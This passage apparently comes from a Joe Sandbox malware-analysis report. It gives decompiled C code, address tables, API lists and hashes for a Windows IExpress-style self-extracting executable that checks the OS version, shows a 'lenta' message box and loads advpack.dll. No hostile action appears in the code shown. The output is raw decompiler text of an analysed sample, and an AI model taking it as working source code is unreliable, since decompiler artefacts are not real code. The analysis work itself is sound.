                                                                                                                                                                                                                                            								__eflags = _t91;
                                                                                                                                                                                                                                            								if(_t91 != 0) {
                                                                                                                                                                                                                                            									goto L37;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                                                                                                                                                                                            								L27:
                                                                                                                                                                                                                                            								if(__eflags <= 0) {
                                                                                                                                                                                                                                            									goto L37;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								L28:
                                                                                                                                                                                                                                            								__eflags = _t135;
                                                                                                                                                                                                                                            								if(_t135 == 0) {
                                                                                                                                                                                                                                            									goto L33;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t138 = 0x54c;
                                                                                                                                                                                                                                            								goto L30;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _t91;
                                                                                                                                                                                                                                            							_t107 = _v416.dwBuildNumber;
                                                                                                                                                                                                                                            							if(_t91 != 0) {
                                                                                                                                                                                                                                            								_t131 = _v424;
                                                                                                                                                                                                                                            								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                                                                                                                                                                                            								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                                                                                                                                                                                            									goto L37;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L28;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t132 = _t107 & 0x0000ffff;
                                                                                                                                                                                                                                            							_t109 = _v424;
                                                                                                                                                                                                                                            							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                                                                                                                                                                                            							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                                                                                                                                                                                            								goto L28;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                                                                                                                                                                                            							goto L27;
                                                                                                                                                                                                                                            							L33:
                                                                                                                                                                                                                                            							_t135 =  &(_t135[1]);
                                                                                                                                                                                                                                            							_v428 = _t135;
                                                                                                                                                                                                                                            							_v420 = _t135;
                                                                                                                                                                                                                                            							__eflags = _t135 - 2;
                                                                                                                                                                                                                                            						} while (_t135 < 2);
                                                                                                                                                                                                                                            						goto L36;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__eflags = _t77 == 1;
                                                                                                                                                                                                                                            					if(_t77 == 1) {
                                                                                                                                                                                                                                            						 *0x8d9a40 = _t119;
                                                                                                                                                                                                                                            						 *0x8d8184 = 1;
                                                                                                                                                                                                                                            						 *0x8d8180 = 1;
                                                                                                                                                                                                                                            						__eflags = _t133 - 3;
                                                                                                                                                                                                                                            						if(_t133 > 3) {
                                                                                                                                                                                                                                            							__eflags = _t133 - 5;
                                                                                                                                                                                                                                            							if(_t133 < 5) {
                                                                                                                                                                                                                                            								goto L14;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t113 = 3;
                                                                                                                                                                                                                                            							_t119 = _t113;
                                                                                                                                                                                                                                            							goto L13;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t119 = 1;
                                                                                                                                                                                                                                            						_t114 = 3;
                                                                                                                                                                                                                                            						 *0x8d9a40 = 1;
                                                                                                                                                                                                                                            						__eflags = _t133 - _t114;
                                                                                                                                                                                                                                            						if(__eflags < 0) {
                                                                                                                                                                                                                                            							L9:
                                                                                                                                                                                                                                            							 *0x8d8184 = _t135;
                                                                                                                                                                                                                                            							 *0x8d8180 = _t135;
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                                                            						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						goto L9;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t138 = 0x4ca;
                                                                                                                                                                                                                                            					goto L44;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t138 = 0x4b4;
                                                                                                                                                                                                                                            					L44:
                                                                                                                                                                                                                                            					_push(_t135);
                                                                                                                                                                                                                                            					_push(0x10);
                                                                                                                                                                                                                                            					_push(_t135);
                                                                                                                                                                                                                                            					_push(_t135);
                                                                                                                                                                                                                                            					L65:
                                                                                                                                                                                                                                            					_t133 = _t138;
                                                                                                                                                                                                                                            					E008D44B9(0, _t138);
                                                                                                                                                                                                                                            					L66:
                                                                                                                                                                                                                                            					return E008D6CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}





































                                                                                                                                                                                                                                            0x008d36f9
                                                                                                                                                                                                                                            0x008d3700
                                                                                                                                                                                                                                            0x008d370c
                                                                                                                                                                                                                                            0x008d3716
                                                                                                                                                                                                                                            0x008d3718
                                                                                                                                                                                                                                            0x008d371b
                                                                                                                                                                                                                                            0x008d3721
                                                                                                                                                                                                                                            0x008d372b
                                                                                                                                                                                                                                            0x008d373d
                                                                                                                                                                                                                                            0x008d3745
                                                                                                                                                                                                                                            0x008d3746
                                                                                                                                                                                                                                            0x008d3746
                                                                                                                                                                                                                                            0x008d3749
                                                                                                                                                                                                                                            0x008d37ab
                                                                                                                                                                                                                                            0x008d37ad
                                                                                                                                                                                                                                            0x008d37ae
                                                                                                                                                                                                                                            0x008d37b3
                                                                                                                                                                                                                                            0x008d37b8
                                                                                                                                                                                                                                            0x008d37b8
                                                                                                                                                                                                                                            0x008d37bf
                                                                                                                                                                                                                                            0x008d37bf
                                                                                                                                                                                                                                            0x008d37c5
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d37cb
                                                                                                                                                                                                                                            0x008d37cd
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d37d5
                                                                                                                                                                                                                                            0x008d37db
                                                                                                                                                                                                                                            0x008d37e8
                                                                                                                                                                                                                                            0x008d37ea
                                                                                                                                                                                                                                            0x008d37ea
                                                                                                                                                                                                                                            0x008d37ea
                                                                                                                                                                                                                                            0x008d37f0
                                                                                                                                                                                                                                            0x008d37f6
                                                                                                                                                                                                                                            0x008d3805
                                                                                                                                                                                                                                            0x008d3817
                                                                                                                                                                                                                                            0x008d382b
                                                                                                                                                                                                                                            0x008d3830
                                                                                                                                                                                                                                            0x008d3836
                                                                                                                                                                                                                                            0x008d383b
                                                                                                                                                                                                                                            0x008d383d
                                                                                                                                                                                                                                            0x008d38eb
                                                                                                                                                                                                                                            0x008d38eb
                                                                                                                                                                                                                                            0x008d38f2
                                                                                                                                                                                                                                            0x008d390c
                                                                                                                                                                                                                                            0x008d3911
                                                                                                                                                                                                                                            0x008d3911
                                                                                                                                                                                                                                            0x008d3913
                                                                                                                                                                                                                                            0x008d394d
                                                                                                                                                                                                                                            0x008d394d
                                                                                                                                                                                                                                            0x008d394f
                                                                                                                                                                                                                                            0x008d38a9
                                                                                                                                                                                                                                            0x008d38a9
                                                                                                                                                                                                                                            0x008d38b0
                                                                                                                                                                                                                                            0x008d38b2
                                                                                                                                                                                                                                            0x008d38b9
                                                                                                                                                                                                                                            0x008d38bb
                                                                                                                                                                                                                                            0x008d38c1
                                                                                                                                                                                                                                            0x008d3975
                                                                                                                                                                                                                                            0x008d38c7
                                                                                                                                                                                                                                            0x008d38de
                                                                                                                                                                                                                                            0x008d38e0
                                                                                                                                                                                                                                            0x008d38e0
                                                                                                                                                                                                                                            0x008d397b
                                                                                                                                                                                                                                            0x008d397d
                                                                                                                                                                                                                                            0x008d39a9
                                                                                                                                                                                                                                            0x008d397f
                                                                                                                                                                                                                                            0x008d3982
                                                                                                                                                                                                                                            0x008d398b
                                                                                                                                                                                                                                            0x008d398d
                                                                                                                                                                                                                                            0x008d398f
                                                                                                                                                                                                                                            0x008d399f
                                                                                                                                                                                                                                            0x008d39a1
                                                                                                                                                                                                                                            0x008d3991
                                                                                                                                                                                                                                            0x008d3991
                                                                                                                                                                                                                                            0x008d3991
                                                                                                                                                                                                                                            0x008d398f
                                                                                                                                                                                                                                            0x008d39af
                                                                                                                                                                                                                                            0x008d39b6
                                                                                                                                                                                                                                            0x008d3a0f
                                                                                                                                                                                                                                            0x008d3a0f
                                                                                                                                                                                                                                            0x008d3a11
                                                                                                                                                                                                                                            0x008d3a13
                                                                                                                                                                                                                                            0x008d3a19
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d39b8
                                                                                                                                                                                                                                            0x008d39b8
                                                                                                                                                                                                                                            0x008d39ba
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d39bc
                                                                                                                                                                                                                                            0x008d39bf
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d39c3
                                                                                                                                                                                                                                            0x008d39c9
                                                                                                                                                                                                                                            0x008d39ce
                                                                                                                                                                                                                                            0x008d39d0
                                                                                                                                                                                                                                            0x008d39e3
                                                                                                                                                                                                                                            0x008d39e5
                                                                                                                                                                                                                                            0x008d39e6
                                                                                                                                                                                                                                            0x008d39f1
                                                                                                                                                                                                                                            0x008d39f7
                                                                                                                                                                                                                                            0x008d39fa
                                                                                                                                                                                                                                            0x008d3a01
                                                                                                                                                                                                                                            0x008d3a04
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3a06
                                                                                                                                                                                                                                            0x008d3a09
                                                                                                                                                                                                                                            0x008d3a09
                                                                                                                                                                                                                                            0x008d3a0b
                                                                                                                                                                                                                                            0x008d3a0b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3a09
                                                                                                                                                                                                                                            0x008d39fc
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d39fc
                                                                                                                                                                                                                                            0x008d39d3
                                                                                                                                                                                                                                            0x008d39d8
                                                                                                                                                                                                                                            0x008d39da
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d39dc
                                                                                                                                                                                                                                            0x008d39b6
                                                                                                                                                                                                                                            0x008d3955
                                                                                                                                                                                                                                            0x008d395b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3961
                                                                                                                                                                                                                                            0x008d3963
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3969
                                                                                                                                                                                                                                            0x008d3969
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3969
                                                                                                                                                                                                                                            0x008d3915
                                                                                                                                                                                                                                            0x008d3915
                                                                                                                                                                                                                                            0x008d391b
                                                                                                                                                                                                                                            0x008d391f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d392d
                                                                                                                                                                                                                                            0x008d3933
                                                                                                                                                                                                                                            0x008d3938
                                                                                                                                                                                                                                            0x008d393a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3940
                                                                                                                                                                                                                                            0x008d3946
                                                                                                                                                                                                                                            0x008d394b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d394b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d38f2
                                                                                                                                                                                                                                            0x008d3843
                                                                                                                                                                                                                                            0x008d3845
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d384b
                                                                                                                                                                                                                                            0x008d384d
                                                                                                                                                                                                                                            0x008d3883
                                                                                                                                                                                                                                            0x008d3885
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d389a
                                                                                                                                                                                                                                            0x008d389e
                                                                                                                                                                                                                                            0x008d389e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d38a0
                                                                                                                                                                                                                                            0x008d38a0
                                                                                                                                                                                                                                            0x008d38a2
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d38a4
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d38a4
                                                                                                                                                                                                                                            0x008d384f
                                                                                                                                                                                                                                            0x008d3851
                                                                                                                                                                                                                                            0x008d3857
                                                                                                                                                                                                                                            0x008d386e
                                                                                                                                                                                                                                            0x008d3877
                                                                                                                                                                                                                                            0x008d387b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3881
                                                                                                                                                                                                                                            0x008d3859
                                                                                                                                                                                                                                            0x008d385c
                                                                                                                                                                                                                                            0x008d3862
                                                                                                                                                                                                                                            0x008d3866
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3868
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d38f4
                                                                                                                                                                                                                                            0x008d38f4
                                                                                                                                                                                                                                            0x008d38f5
                                                                                                                                                                                                                                            0x008d38fb
                                                                                                                                                                                                                                            0x008d3901
                                                                                                                                                                                                                                            0x008d3901
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d390a
                                                                                                                                                                                                                                            0x008d374b
                                                                                                                                                                                                                                            0x008d374e
                                                                                                                                                                                                                                            0x008d375c
                                                                                                                                                                                                                                            0x008d3764
                                                                                                                                                                                                                                            0x008d3769
                                                                                                                                                                                                                                            0x008d376e
                                                                                                                                                                                                                                            0x008d3771
                                                                                                                                                                                                                                            0x008d379c
                                                                                                                                                                                                                                            0x008d379f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d37a3
                                                                                                                                                                                                                                            0x008d37a4
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d37a4
                                                                                                                                                                                                                                            0x008d3773
                                                                                                                                                                                                                                            0x008d3777
                                                                                                                                                                                                                                            0x008d3778
                                                                                                                                                                                                                                            0x008d377f
                                                                                                                                                                                                                                            0x008d3781
                                                                                                                                                                                                                                            0x008d378e
                                                                                                                                                                                                                                            0x008d378e
                                                                                                                                                                                                                                            0x008d3794
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3794
                                                                                                                                                                                                                                            0x008d3783
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3785
                                                                                                                                                                                                                                            0x008d378c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d378c
                                                                                                                                                                                                                                            0x008d3750
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d372d
                                                                                                                                                                                                                                            0x008d372d
                                                                                                                                                                                                                                            0x008d396b
                                                                                                                                                                                                                                            0x008d396b
                                                                                                                                                                                                                                            0x008d396c
                                                                                                                                                                                                                                            0x008d396e
                                                                                                                                                                                                                                            0x008d396f
                                                                                                                                                                                                                                            0x008d3a1e
                                                                                                                                                                                                                                            0x008d3a1e
                                                                                                                                                                                                                                            0x008d3a22
                                                                                                                                                                                                                                            0x008d3a27
                                                                                                                                                                                                                                            0x008d3a3e
                                                                                                                                                                                                                                            0x008d3a3e

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 008D3723
                                                                                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 008D39C3
                                                                                                                                                                                                                                            • MessageBoxA.USER32(00000000,00000000,lenta,00000030), ref: 008D39F1
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Message$BeepVersion
                                                                                                                                                                                                                                            • String ID: 3$lenta
                                                                                                                                                                                                                                            • API String ID: 2519184315-4216304122
                                                                                                                                                                                                                                            • Opcode ID: 2fc02f71d996e8b4b999eee34d246ff2f27d6c68985c740c84dc9bce453d877d
                                                                                                                                                                                                                                            • Instruction ID: 126b29f84d4589ad5f9a9dde4a516676a0fd00e2bbae86859e43498ce6ee0bbf
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2fc02f71d996e8b4b999eee34d246ff2f27d6c68985c740c84dc9bce453d877d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F91C3B1B01228ABDB758B15CC91BAA77B1FB45314F1503ABD889EB351DB708F81DB42
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 83%
                                                                                                                                                                                                                                            			E008D6495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				signed char _t14;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t15;
                                                                                                                                                                                                                                            				void* _t18;
                                                                                                                                                                                                                                            				CHAR* _t26;
                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                            				signed int _t28;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t27 = __esi;
                                                                                                                                                                                                                                            				_t18 = __ebx;
                                                                                                                                                                                                                                            				_t9 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_v8 = _t9 ^ _t28;
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				E008D1781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                                                            				_t26 = "advpack.dll";
                                                                                                                                                                                                                                            				E008D658A( &_v268, 0x104, _t26);
                                                                                                                                                                                                                                            				_t14 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                            				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                                                                                                                                                                                            					_t15 = LoadLibraryA(_t26);
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E008D6CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                                            0x008d6495
                                                                                                                                                                                                                                            0x008d6495
                                                                                                                                                                                                                                            0x008d64a0
                                                                                                                                                                                                                                            0x008d64a7
                                                                                                                                                                                                                                            0x008d64ab
                                                                                                                                                                                                                                            0x008d64bd
                                                                                                                                                                                                                                            0x008d64c2
                                                                                                                                                                                                                                            0x008d64d3
                                                                                                                                                                                                                                            0x008d64df
                                                                                                                                                                                                                                            0x008d64e8
                                                                                                                                                                                                                                            0x008d6502
                                                                                                                                                                                                                                            0x008d64ee
                                                                                                                                                                                                                                            0x008d64f9
                                                                                                                                                                                                                                            0x008d64f9
                                                                                                                                                                                                                                            0x008d6516

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 008D64DF
                                                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 008D64F9
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 008D6502
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                                                                                                                                                                                                                                            • API String ID: 438848745-3680919256
                                                                                                                                                                                                                                            • Opcode ID: beab8c2dea6fb838aebdbd660a6fb5d190c8117ce3ebb311b8a8d052147d991c
                                                                                                                                                                                                                                            • Instruction ID: 15e19756e5293edd89924fbd337b2d54ff1309442a29d2fd8380a621c21fb779
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: beab8c2dea6fb838aebdbd660a6fb5d190c8117ce3ebb311b8a8d052147d991c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4A01AD70A00108ABDB149B68EC49EEA7378FB60310F500397F585D22D4EE709EDA8A52
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E008D28E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				char* _v12;
                                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                                            				void* _v20;
                                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                                            				int _v28;
                                                                                                                                                                                                                                            				int _v32;
                                                                                                                                                                                                                                            				void* _v36;
                                                                                                                                                                                                                                            				int _v40;
                                                                                                                                                                                                                                            				void* _v44;
                                                                                                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                                                                                                            				intOrPtr _v52;
                                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                                            				intOrPtr _v60;
                                                                                                                                                                                                                                            				intOrPtr _v64;
                                                                                                                                                                                                                                            				long _t68;
                                                                                                                                                                                                                                            				void* _t70;
                                                                                                                                                                                                                                            				void* _t73;
                                                                                                                                                                                                                                            				void* _t79;
                                                                                                                                                                                                                                            				void* _t83;
                                                                                                                                                                                                                                            				void* _t87;
                                                                                                                                                                                                                                            				void* _t88;
                                                                                                                                                                                                                                            				intOrPtr _t93;
                                                                                                                                                                                                                                            				intOrPtr _t97;
                                                                                                                                                                                                                                            				intOrPtr _t99;
                                                                                                                                                                                                                                            				int _t101;
                                                                                                                                                                                                                                            				void* _t103;
                                                                                                                                                                                                                                            				void* _t106;
                                                                                                                                                                                                                                            				void* _t109;
                                                                                                                                                                                                                                            				void* _t110;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_v12 = __edx;
                                                                                                                                                                                                                                            				_t99 = __ecx;
                                                                                                                                                                                                                                            				_t106 = 0;
                                                                                                                                                                                                                                            				_v16 = __ecx;
                                                                                                                                                                                                                                            				_t87 = 0;
                                                                                                                                                                                                                                            				_t103 = 0;
                                                                                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                                                                                            				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                                                                                                                                                                                            					L19:
                                                                                                                                                                                                                                            					_t106 = 1;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t62 = 0;
                                                                                                                                                                                                                                            					_v8 = 0;
                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                            						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                                                            						if(E008D2773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                                                            							goto L20;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                                                                                                                                                                                                            						_v28 = _t68;
                                                                                                                                                                                                                                            						if(_t68 == 0) {
                                                                                                                                                                                                                                            							_t99 = _v16;
                                                                                                                                                                                                                                            							_t70 = _v8 + _t99;
                                                                                                                                                                                                                                            							_t93 = _v24;
                                                                                                                                                                                                                                            							_t87 = _v20;
                                                                                                                                                                                                                                            							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                                                            								goto L18;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                                                            							if(_t103 != 0) {
                                                                                                                                                                                                                                            								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                                                            								_v36 = _t73;
                                                                                                                                                                                                                                            								if(_t73 != 0) {
                                                                                                                                                                                                                                            									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                                                            										L15:
                                                                                                                                                                                                                                            										GlobalUnlock(_t103);
                                                                                                                                                                                                                                            										_t99 = _v16;
                                                                                                                                                                                                                                            										L18:
                                                                                                                                                                                                                                            										_t87 = _t87 + 1;
                                                                                                                                                                                                                                            										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                                                            										_v20 = _t87;
                                                                                                                                                                                                                                            										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                                                            										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                                                                                                                                                                                            											continue;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											goto L19;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t79 = _v44;
                                                                                                                                                                                                                                            										_t88 = _t106;
                                                                                                                                                                                                                                            										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                                                                                                                                                            										_t101 = _v28;
                                                                                                                                                                                                                                            										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                                                                                                                                            										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                                                                                                                                                                                            										_t97 = _v48;
                                                                                                                                                                                                                                            										_v36 = _t83;
                                                                                                                                                                                                                                            										_t109 = _t83;
                                                                                                                                                                                                                                            										do {
                                                                                                                                                                                                                                            											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E008D2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                                                                                                                                                                                            											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E008D2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                                                                                                                                                                                            											_t109 = _t109 + 0x18;
                                                                                                                                                                                                                                            											_t88 = _t88 + 4;
                                                                                                                                                                                                                                            										} while (_t88 < 8);
                                                                                                                                                                                                                                            										_t87 = _v20;
                                                                                                                                                                                                                                            										_t106 = 0;
                                                                                                                                                                                                                                            										if(_v56 < 0 || _v64 > 0) {
                                                                                                                                                                                                                                            											if(_v52 < _t106 || _v60 > _t106) {
                                                                                                                                                                                                                                            												GlobalUnlock(_t103);
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												goto L15;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											goto L15;
                                                                                                                                                                                                                                            										}
